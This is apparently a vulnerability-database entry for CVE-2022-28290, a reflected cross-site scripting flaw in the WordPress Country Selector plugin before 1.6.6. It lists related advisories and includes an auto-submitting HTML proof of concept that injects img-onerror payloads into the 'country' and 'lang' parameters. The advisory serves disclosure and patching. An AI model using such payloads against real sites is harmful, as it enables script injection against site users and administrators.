Lucene search

Country Selector < 1.6.6 - Reflected Cross-Site Scripting

🗓️ 20 Apr 2022 00:00:00Reported by wpvulndbType

wpexploit👁 93 Views

Country Selector < 1.6.6 - Reflected Cross-Site Scriptin

Reporter	Title	Published	Views	Family All 8
CVE	CVE-2022-28290	25 Apr 202217:15	–	cve
Patchstack	WordPress Country Selector premium plugin <= 1.6.5 - Reflected Cross-Site Scripting (XSS) vulnerability	20 Apr 202200:00	–	patchstack
Cvelist	CVE-2022-28290	25 Apr 202216:31	–	cvelist
Prion	Cross site scripting	25 Apr 202217:15	–	prion
CNVD	WordPress Country Selector Plugin跨站脚本漏洞	26 Apr 202200:00	–	cnvd
WPVulnDB	Country Selector < 1.6.6 - Reflected Cross-Site Scripting	20 Apr 202200:00	–	wpvulndb
NVD	CVE-2022-28290	25 Apr 202217:15	–	nvd
Nuclei	WordPress Country Selector <1.6.6 - Cross-Site Scripting	10 May 202208:47	–	nuclei

Source	Link
cybersecurityworks	www.cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=check_country_selector" method="POST">
      <input type="hidden" name="country" value="<img+src=x+onerror=alert(/XSS-country/)>" />
      <input type="hidden" name="lang" value="<img+src=x+onerror=alert(/XSS-lang/)>" />
      <input type="hidden" name="site_locate" value="en-US" />
    </form>
  </body>
</html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

20 Apr 2022 00:00Current

6.2Medium risk

Vulners AI Score6.2

EPSS0.02732